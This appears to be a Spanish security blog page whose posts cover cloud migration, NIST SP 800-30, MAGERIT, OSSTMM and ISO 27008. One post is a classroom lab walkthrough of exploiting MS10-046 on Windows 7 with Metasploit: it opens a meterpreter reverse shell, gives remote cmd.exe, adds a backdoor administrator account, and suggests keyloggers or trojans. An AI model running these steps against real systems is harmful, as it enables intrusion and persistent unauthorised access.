viernes, 4 de diciembre de 2015

Las Ventajas y Desventajas de Migrar a Cloud


Cada día escuchamos más a nuestros "asesores tecnológicos" (empresas de servicios) que nos hablan de sus data centers y de las grandes ventajas de migrar a la nube, pero todo es tan positivo? de verdad es tan simple?, Bueno quiero comentarles desde mi punto de vista profesional los errores más comunes que me ha tocado vivir como ingeniero a cargo de un par de este tipo de proyectos, no es una gran guía ni tampoco pienso abarcar todo, sino simplemente escribir de forma clara y básica lo que a veces para las direcciones de las empresas resulta ser un poco enredado.



1.- Debemos preguntarnos el Cloud es apropiado para mi compaña?

Sabemos que empresas con datos sensibles y en su mayor caso de carácter confidencial difícilmente querría mover sus datos o aplicaciones a la nube de un tercero porque se pierde el control de la seguridad de la información y no solo es tipo de empresas sino que muchas otras por diversas razones no moverían su data a la nube, por ende la primera realidad es "La migración a la nube no es adecuada para todos" , aunque no podemos dejar de pensar y evaluar que la nube goza inicialmente de las siguientes 3 características :


  • Escalable 
  • Confiable 
  • De Alta Disponibilidad 

Estos 3 factores  son impulsadores para tomar una decisión, pero esta decisión debe ser imparcial y hay que evaluar unas cuantas otras características.

2.- Evaluemos algunos beneficios

Como en todo proyecto hay muchos beneficios que podrían tomar la ventaja de decidir que este puede ser el gran proyecto del área de TI. ¿Cuales?


A) Beneficios Asociados al costo y continuidad del negocio
  • Demanda de tráfico de recursos que hacen insostenible seguir adquiriendo equipamiento para satisfacer la demanda (storages, enlaces más rápidos, MPLS mas rápida, mejores switch, conexión de 10 GB o 40 GB, fibra, obras civiles, contratistas y todo lo que conlleva mejorar de manera Stand Alone los servicios de una empresa). 
  • Reducir Costos Operativos, quizás tiene Help Desk de 3 turnos y ya quisiera dejar el turno de noche o pagar a los especialistas por turnos los feriados o fines de semana, mayor infraestructura requiere especialistas más capacitados y crecer e infraestructura a la larga obligara a crecer en personal TI. 
  • Su compañía se está expandiendo y una infraestructura multí región o país requiere de grandes conocimientos y personal más experimentado, además de elevados costos (para quienes hemos trabajado con sucursales en otros países sabemos que no es lo mismo trabajar un proyecto con un mexicano que hacerlo con un argentino, son idiosincrasias distintas y requiere a jefes de proyecto muy capacitados para que todo funcione como se debe y en un corto tiempo). 
  • El recurso byte es su talón de alquiles, me refiero a no ser capaz de satisfacer todas las demandadas de almacenamiento. 
  • Generar desarrollos y teletrabajo centralizado, mejor dicho, hablar de desarrollo distribuido. 
  • Para muchas empresas su Disaster Recovery Plan significa replicar y quizás tener algún enlace de respaldo, pero sabemos que eso no es tan realista y si bien ayudará a la continuidad del negocio no se acerca a las bondades de un Cloud Disaster Recovery que sería más fácil de implementar. 
  • Delegar la administración de su infraestructura, pero no todo ya que es un error delegar toda la administración de su infraestructura (Solo actividades simples y que le quitan tiempo a su personal backup, Wsus, algunas replicaciones, etc)

B) Desventajas

Como en todo proyecto no puede ignorar que las desventajas también son u ámbito importante a evaluar:
  • Sus aplicaciones son demasiado precisas a nivel transaccional y quizás la latencia podría jugar muy en contra en cuanto a las actualizaciones y a tener los clientes nada de contentos. 
  • Si su escenario al día de hoy funciona bien y está todo controlado seria mover el mar para hacer grandes olas al querer migrar. 
  • Tiene desarrollos propios que quizás serán imposibles de llevar a la nube (aunque le digan que si, usted confié en su experiencia y olfato) 
  • Pérdida del control de la plataforma e infraestructura, tiempos alargados de migración fuera de plazos previstos, marcha blanca muy lenta y con muchos reclamos de sus usuarios. 
  • No evaluar la mejor opción y quizás tener que solicitar un re-diseño sobra la migración. 
  • Migrar la infraestructura a otro Cloud por cambio de proveedor puede ser tráumante. 
  • Despedir a su personal calificado para reducir costos operaciones y luego darse cuenta que contratar nuevo personal será de costo más elevado.


Por supuesto cada quién al viajar tiene una experiencia distinta y quizás usted tenga otras ventajas o desventajas que yo no he considerado, pero solo medite que esto es la básico que debemos evaluar.

2.-Que migrar? Que tipo de Cloud debo elegir?

En otro artículo me quiero referir al Hybrid Cloud pero por ahora para no complicarnos les diré que solo tiene 3 opciones:

  1. IaaS  : Servicio de Infraestructura (AWS, Azure, Google Compute Engine).
  2. SaaS : Servicio de Software (Google Apps, Salesforce, Office 365, algún ERP, etc).
  3. PaaS : Servicio de Plataformas (AWS Elastic Beanstalk, Heroku, Google App Engine).

Y es acá donde radica la decisión mas importante que usted debe tomar.


Entonces que decidir?



Si solo necesito infraestructura, si solo es necesario migrar mis aplicaciones (desarrollo) a la nube y centralizar o si necesito el gran cambio y migrar todo dejando solo una pequeña parte funcionando físicamente en mi compañía.
En el siguiente articulo comentaré un poco sobre Cloud Pública, Privada, o Híbrida?


Saludos a todos.








sábado, 21 de noviembre de 2015

Hackear Windows 7 Pro con Kali Linux y Metasploit Framework

Amigos esta vez les quiero compartir una de las actividades practicas que he realizado con mis alumnos de Taller de Seguridad en Redes y se trata de como hackear un sistema operativo Windows 7 con Kali linux y metasploit en pocos pasos.

Utilizaremos la técnica de DLL Loader
Los requerimientos

  • Kali Lnux 2.x y Rubi instalado
  • PC con WIndows 7 Pro
  • Metasploit Framework



Esta guía aplica a sistemas operativos sin antivirus/Firewall y con control de cuentas de usuario disminuidas o desactivadas

¿Qué es MetaSploit?

En pocas palabras Metasploit  Project es un proyecto de seguridad informática que proporciona información acerca de las vulnerabilidades de seguridad y ayuda en las pruebas de penetración y desarrollo de firmas de IDS.


Preparándonos para el ataque, en mi caso utilizaré 2 máquinas cargadas en virtualbox previamente el pc con windows tiene la IP 192.168.56.101 y el con Kali linux la IP 192.168.56.102



1.- Iniciamos las máquinas y debemos conocer obviamente cada una de las direcciones IP


2.- En Kali Linux ingresamos a una terminal para iniciar metasploit y ejecutamos las siguientes lineas, en nuestro caso utilizaremos el exploit de meterpreter

root@kali:~# msfconsole 
Metasploit Park, System Security Interface
Version 4.0.5, Alpha E
Ready...

msf > use exploit/windows/browser/ms10_046_shortcut_icon_dllloader 
msf exploit(ms10_046_shortcut_icon_dllloader) >


msf exploit(ms10_046_shortcut_icon_dllloader) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp

msf exploit(ms10_046_shortcut_icon_dllloader) > show options 

Ahora Aparecerán las opciones para configurar el servidor



3.- Asignaremos la IP del PC con Kali linux al SRVHOSTy LHOST

msf exploit(ms10_046_shortcut_icon_dllloader) > set SRVHOST 192.168.56.102
SRVHOST => 192.168.56.102
msf exploit(ms10_046_shortcut_icon_dllloader) > set LHOST 192.168.56.102
LHOST => 192.168.56.102

4.- Iniciamos el exploit

msf exploit(ms10_046_shortcut_icon_dllloader) > exploit 
[*] Exploit running as background job.
[*] Started reverse handler on 192.168.56.102:4444 
[*] Send vulnerable clients to \\192.168.56.102\TXSWXRTH\.
[*] Or, get clients to save and render the icon of http:///.lnk
[*] Using URL: http://192.168.56.102:80/
[*] Server started.
msf exploit(ms10_046_shortcut_icon_dllloader) >

Si nos fijamos hay una linea que dice "Using URL: http://192.168.56.102:80/" que es la que debemos utilizar en windows 7 desde el navegador



5- Una vez que accedamos a la dirección se nos abrirá una ventana preguntando si permitimos la conexión, damos clic en permitir.


Por su parte en la consola de metasploit comienza a emitir los logs del ataque

6.- al permitr se ejecutará el "dllloader" por lo que basta hacer un clic sobre el acceso directo

7.- En los log de  msfconsole veremos que se habilita la sesión 1 y para ello hacemos un enter para despejar los logs y escribimos

msf exploit(ms10_046_shortcut_icon_dllloader) > sessions -i
Active sessions
===============
  Id  Type                   Information                            Connection
  --  ----                   -----------                            ----------
  1   meterpreter x86/win32  GeekLinux-PC\GeekLinux @ GeekLinux-PC  192.168.56.102:4444 -> 192.168.56.101:49276 (192.168.56.101)

8.- Nos dice que esta la sesión 1 establecida por lo que el comando para seleccionar la sesión es similar al anterior solo que agregamos el número de la sesión al final.

msf exploit(ms10_046_shortcut_icon_dllloader) > sessions -i 1

9.- Aparecerá la consola de Meterpreter

msf exploit(ms10_046_shortcut_icon_dllloader) > sessions -i 1
[*] Starting interaction with 1...
meterpreter >


Existe mucha documentación acerca de los comandos de meterpreter, acá podríamos inyectar un trayano o un keylogger, crear o copiar archivos, agregar usuarios, etc.


Ejemplo de captura de pantalla del PC atacado

meterpreter > screenshot


En la carpeta Root nos aparece la captura de pantalla


Ejemplo acceder a cmd.exe remotamente

meterpreter > execute -f cmd.exe -i –H
Microsoft Windows [Version 6.1.7600]
Copyright (c) 2009 Microsoft Corporation. Reservados todos los derechos.
C:\Windows\system32>

Ejemplo agregar un usuario

C:\Windows\system32> net user GeekLinux 123456 /add

Hemos creado a un usuario llamado GeekLinux y su clave de acceso es 123456

Ejemplo Agregar al usuario al grupo administradores

C:\Windows\system32> net localgroup Administradores GeekLinux /add



Existe una infinidad de cosas que hacer, por supuesto crear un usuario evidenciaría mucho que el equipo ha sido hackeado pero complementar con otros ataques de metasploit como inyectar un troyano o algún keylogger seria mejor, o simplemente realizar copias de los archivos que desea, etc.

Esta guía esta realizada solo con fines académicos, para utilizarla no olviden hacer referencia a mi blog, Saludos



domingo, 4 de octubre de 2015

Metodología NIST SP 800-30 Para Análisis de Riesgo Informático

El análisis de riesgos informáticos es un proceso que comprende la identificación de activos informáticos, sus vulnerabilidades y amenazas a los que se encuentran expuestos así como su probabilidad de ocurrencia y el impacto de las mismas, a fin de determinar los controles adecuados para aceptar, disminuir, transferir o evitar la ocurrencia del riesgo.

Teniendo en cuenta que la explotación de un riesgo causaría daños o pérdidas financieras o administrativas a una empresa u organización, se tiene la necesidad de poder estimar la magnitud del impacto del riesgo a que se encuentra expuesta mediante la aplicación de controles. Dichos controles, para que sean efectivos, deben ser implementados en conjunto formando una arquitectura de seguridad con la finalidad de preservar las propiedades de confidencialidad, integridad y disponibilidad de los recursos objetos de riesgo.

NIST SP 800-30

Esta serie incluye una  metodología para el análisis  y gestión de riesgos de seguridad de la información,  alineada y complementaria  con el resto de documentos  de la serie.

9 pasos básicos para el análisis de riesgo

  • Caracterización del sistema. 
  • Identificación de amenazas. 
  • Identificación de vulnerabilidades. 
  • Control de análisis. 
  • Determinación del riesgo. 
  • Análisis de impacto. 
  • Determinación del riesgo. 
  • Recomendaciones de control. 
  • Resultado de la implementación o documentación


sábado, 3 de octubre de 2015

Metodología MAGERIT Para Análisis de Riesgo Informático

El análisis de riesgos informáticos es un proceso que comprende la identificación de activos informáticos, sus vulnerabilidades y amenazas a los que se encuentran expuestos así como su probabilidad de ocurrencia y el impacto de las mismas, a fin de determinar los controles adecuados para aceptar, disminuir, transferir o evitar la ocurrencia del riesgo.

Teniendo en cuenta que la explotación de un riesgo causaría daños o pérdidas financieras o administrativas a una empresa u organización, se tiene la necesidad de poder estimar la magnitud del impacto del riesgo a que se encuentra expuesta mediante la aplicación de controles. Dichos controles, para que sean efectivos, deben ser implementados en conjunto formando una arquitectura de seguridad con la finalidad de preservar las propiedades de confidencialidad, integridad y disponibilidad de los recursos objetos de riesgo.


Metodología MAGERIT (Metodología de Análisis y Gestión de Riesgos de IT)

Es una metodología que se esfuerza por enfatizarse en dividir los activos de la organización en variados grupos, para identificar más riesgos y poder tomar contramedidas para  evitar así cualquier inconveniente.

Objetivos

Objetivos Directos
  • Concienciar a los responsables de los sistemas de información de la existencia  de riesgos y de la necesidad de atajarlos a tiempo. 
  • Ofrecer un método sistemático para analizar tales riesgos 
  • Ayudar a descubrir y planificar las medidas oportunas para mantener los riesgos bajo  control
Objetivos Indirectos
  • Preparar a la Organización  para procesos de evaluación, auditoria,  certificación o acreditación, según corresponda en cada  caso..

Sub Modelos

Sub Modelo De Elementos
  • Es este submodelo se clasifican 6 elementos básicos que son: activos, amenazas, vulnerabilidades, impacto, riesgo, salvaguarda.
Sub Modelo De Eventos
  • Aquí se clasifican los elementos anteriores en tres formas: dinámico  físico, dinámico organizativo y estático.
Sub Modelo De Procesos
  • Se definen en 4 etapas: análisis de riesgo, planificación, gestión de riesgo y selección de salvaguardas

Volúmenes

Volumen I - Método
  • Es el volumen principal en el que se explica detalladamente la  metodología.

Volumen II – Catalogo  de elementos

  • Complementa el volumen principal proporcionando diversos inventarios de utilidad en la aplicación de la metodología. 
Volumen III – Guía de  técnicas
  • Complementa el volumen principal proporcionando una introducción de algunas de técnicas a utilizar en las  distintas fases del análisis de riesgos. 

Tecnicas

  • Análisis mediante tablas  
  • Análisis algorítmico 
  • Árboles de ataque 
  • Técnicas generales o  
  • Análisis coste-beneficio  
  • Diagramas de flujo de datos (DFD) 
  • Diagramas de procesos 
  • Técnicas gráficas 
  • Planificación de proyectos 
  • Sesiones de trabajo: entrevistas, reuniones y
  • presentaciones
  • Valoración Delphi

Seguridad de la Información y Seguridad Informática



Es común hablar de seguridad informática y de seguridad de la información como si fueran la misma cosa y, a primera vista, pareciera ser, sobre todo si se tiene en cuenta que en la actualidad, gracias al constante desarrollo tecnológico, se tiende a digitalizar todo tipo de información y manejarla a través de un sistema informático. Sin embargo, aunque tengan la necesidad de trabajar en armonía, cada uno de estos aspectos tiene objetivos y actividades diferentes.

Por seguridad informática

Se entiende al conjunto de políticas, reglas, estándares, métodos y protocolos que se utilizan para la protección de la infraestructura de computadoras y toda la información contenida o administrada por ella. Esta información debe ser protegida de la posible destrucción, modificación, difusión o utilización indebida. No sólo se debe prestar atención a los ataques intencionales, sino también a posibles fallas de software o hardware que atenten contra la seguridad.




Por seguridad de la información 

Se refiere a todas aquellas medidas que procuren resguardar la información ante cualquier irregularidad. La principal diferencia entre seguridad informática y seguridad de la información es que la primera se encarga de la seguridad en un medio informático y la segunda se interesa en la información en general (figura), pudiendo ésta estar almacenada tanto en un medio informático como en cualquier otro. Por ejemplo, un manual de procedimientos escrito en papel, el conocimiento que poseen las personas, escrituras en pizarras y papeles que se descartan, son fuentes importantes de información.

Fuente; Gastón Alejandro Toth (Tesis)



miércoles, 30 de septiembre de 2015

Categorizaciones OSSTMM (Pentesting)



OSSTMM plantea categorizaciones estándar, que permiten identificar claramente el alcance de cada una de las actividades, evitando inconvenientes en tal sentido:

  1. Búsqueda de Vulnerabilidades: Orientado principalmente a realizar comprobaciones automáticas de un sistema o sistemas dentro de una red.
  2. Escaneo de la Seguridad: Orientado a las búsquedas principales de vulnerabilidades en el sistema que incluyen verificaciones manuales de falsos positivos, identificación de los puntos débiles en el sistemas y análisis individualizado.
  3. Test de Intrusión: Se plantean test de pruebas que se centran en romper la seguridad de un sistema determinado.
  4. Evaluación de Riesgo: se refiere a los análisis de seguridad a través de entrevistas e investigación de nivel medio que incluye la justificación negocios, las justificaciones legales y las justificaciones específicas de la industria.
  5. Auditoria de Seguridad: Se refiere a la continua inspección que sufre el sistema por parte de los administradores que controlan que se cumplan las políticas de seguridad definidas.
  6. Hacking Ético: Orientado a tratar de obtener, a partir de los test de intrusión, objetivos complejos dentro de la red de sistemas.

Etapas Que Comprende El OSSTMM


El Manual de la Metodología Abierta de Comprobación de la Seguridad (OSSTMM, Open Source Security Testing Methodology Manual) es uno de los estándares profesionales más completos y comúnmente utilizados en Auditorías de Seguridad para revisar la Seguridad de los Sistemas desde Internet. Incluye un marco de trabajo que describe las fases que habría que realizar para la ejecución de la auditoría. Se ha logrado gracias a un consenso entre más de 150 expertos internacionales sobre el tema, que colaboran entre sí mediante Internet. Se encuentra en constante evolución y actualmente se compone de las siguientes fases:


Sección A -Seguridad de la Información

  • Revisión de la Inteligencia Competitiva
  • Revision de Privacidad
  • Recolección de Documentos

Sección B – Seguridad de los Procesos

  • Testeo de Solicitud
  • Testeo de Sugerencia Dirigida
  • Testeo de las Personas Confiables

Sección C – Seguridad en las tecnologías de Internet

  • Logística y Controles
  • Exploración de Red
  • Identificación de los Servicios del Sistema
  • Búsqueda de Información Competitiva
  • Revisión de Privacidad
  • Obtención de Documentos
  • Búsqueda y Verificación de Vulnerabilidades
  • Testeo de Aplicaciones de Internet
  • Enrutamiento
  • Testeo de Sistemas Confiados
  • Testeo de Control de Acceso
  • Testeo de Sistema de Detección de Intrusos
  • Testeo de Medidas de Contingencia
  • Descifrado de Contraseñas
  • Testeo de Denegación de Servicios
  • Evaluación de Políticas de Seguridad

Sección D – Seguridad en las Comunicaciones

  • Testeo de PBX
  • Testeo del Correo de Voz
  • Revisión del FAX
  • Testeo del Modem

Sección E – Seguridad Inalámbrica

  • Verificación de Radiación Electromagnética (EMR)
  • Verificación de Redes Inalámbricas [802.11]
  • Verificación de Redes Bluetooth
  • Verificación de Dispositivos de Entrada Inalámbricos
  • Verificación de Dispositivos de Mano Inalámbricos
  • Verificación de Comunicaciones sin Cable
  • Verificación de Dispositivos de Vigilancia Inalámbricos
  • Verificación de Dispositivos de Transacción Inalámbricos
  • Verficación de RFID
  • Verificación de Sistemas Infrarrojos
  • Revisión de Privacidad

Sección F – Seguridad Física

  • Revisión de Perímetro
  • Revisión de monitoreo
  • Evaluación de Controles de Acceso
  • Revisión de Respuesta de Alarmas
  • Revisión de Ubicación
  • Revisión de Entorno


OSSTMM Manual de la Metodología Abierta de Testeo de Seguridad



Open Source Security Testing Methodology Manual 

El OSSTMM comprende la seguridad operacional. 

Se trata de conocer y medir las obras de seguridad como de bien. Esta metodología le dirá si lo que tienes hace lo que usted quiere que haga y no sólo lo que le dijeron que debería hacer. 

Lo que se obtiene a partir de la utilización de OSSTMM es una profunda comprensión de la interconexión de las cosas. Las personas, procesos, sistemas y software de todos tienen algún tipo de relación. Esta interconexión requiere interacciones. Algunas reacciones son pasivas y otras no lo son. Algunas reacciones son simbióticas, mientras que otros son Parasitarias. Algunas interacciones son controladas por un lado de la relación, mientras que otras están controladas por ambas. Podemos tratar de controlar en lo que no podemos confiar, pero aun así algunos controles son deficientes o superfluo, que es
perjudicial para al menos un lado de la relación, si no ambos. Lo que queremos es que nuestros controles equilibran a la perfección con las interacciones que queremos o necesitamos. Así que cuando ponemos a prueba las operaciones obtenemos el panorama general de todas nuestras relaciones, que van y vienen. Llegamos a ver la interconexión de las operaciones en los detalles finos y obtenemos para trazar nuestro negocio y nuestras operaciones que las cosas sean lo que son y  no lo que lo que pueden ser.


¿Por qué las operaciones de prueba? Por desgracia, no todo funciona como se configuró. No todo el mundo se comporta como si estuviese entrenado. Además, más y más cosas se construyen a partir de construcciones prefabricadas de materiales, o el código fuente de las bibliotecas predefinidas, o como en el caso de la formación de las personas y de las experiencias preexistentes. Los nuevos constructores sólo son conscientes de lo que ponen juntos y no cómo funcionan las piezas prefabricadas en un nuevo entorno con nuevas variables y de nuevas maneras. Por lo tanto la verdad de la configuración y la formación es el resultado de las operaciones. Nada nos puede decir más el cómo podemos cumplir con los objetivos o seguir una visión estratégica de cómo hacemos ahora lo que estamos haciendo. Y ese conocimiento nos permite controlar  las interacciones que queremos. Es por eso que tenemos que probar y testear  las operaciones.

El OSSTMM está continuamente en desarrollo a medida que aprendemos más y más acerca de lo que significa ser digno de confianza  y seguro

Sigueme @jordres

ISO/IEC TR 27008:2011 Controles de seguridad de información

ISO/IEC TR 27008: 2011 proporciona orientación sobre la revisión de la implementación y operación de los controles, incluyendo la comprobación de la conformidad técnica de los controles del sistema de información, de conformidad con las normas establecidas de seguridad de información de una organización.

ISO/IEC TR 27008: 2011 se aplica a todos los tipos y tamaños de organizaciones, incluidas las empresas públicas y privadas, entidades gubernamentales y sin fines de lucro, organizaciones que realizan revisiones de seguridad de la información y las pruebas de conformidad técnica.

¿Que es ISO 27008?

Es un estándar que suministra orientación acerca de la implementación y operación de los controles, es aplicable a cualquier tipo y tamaño de empresa, tanto pública como privada que lleve a cabo revisiones relativas a la seguridad de la información y los controles de seguridad de la información.


Es compatible con otras normas como ISO 27001 o ISO 27002, y sirve como plataforma estratégica para garantizar la seguridad de la información.


¿Que Soporta 27008?

soporta tanto la planificación como la ejecución del SGSI y el proceso de gestión del riesgo del sistema de la organización.

Por otro lado, supone un valor añadido y una mejora de la calidad de las normas de la serie ISO 27000.

Mejora las auditorias del SGSI a través de la optimización de la relaciones entre los procesos del Sistema de Gestión de Seguridad de la Información y los controles necesarios para los mismos. Además garantiza un uso eficiente y efectivo de los recursos de la auditoría.

Mientras que ISO 27007 se focaliza en la auditoría de todos los elementos del SGSI, según lo describe ISO 27001, ISO-27008 se dirige a la comprobación de los controles de seguridad de la información.

La norma incluye la comprobación de la conformidad técnica frente a un estándar de implementación de seguridad de la información establecido en la empresa. No busca suministrar orientaciones específicas sobre la verificación del cumplimiento relativo a la medición, evaluación del riesgo o auditoría del SGSI.

Los controles técnicos de los que hablamos no se definen explícitamente en la norma, son los conocidos como controles de seguridad de TI, que no son sino un subconjunto de los controles de seguridad de la información descritos en la norma ISO 27001 e ISO 27002.

Estos controles que trae ISO 27008 ayudarán a la organización a:
  1. Comprender el alcance de los problemas o deficiencias en la aplicación y puesta en marcha de los controles de seguridad de la información, normas de seguridad de la información y controles de la información técnica.
  2. Identificar los posibles impactos en la empresa de las amenazas y vulnerabilidades de seguridad de la información.
  3. Planificar actividades de mitigación de riesgos de seguridad de la información.
  4. Confirmar que las deficiencias de seguridad de información emergentes se han abordado de forma adecuad.

Mas Información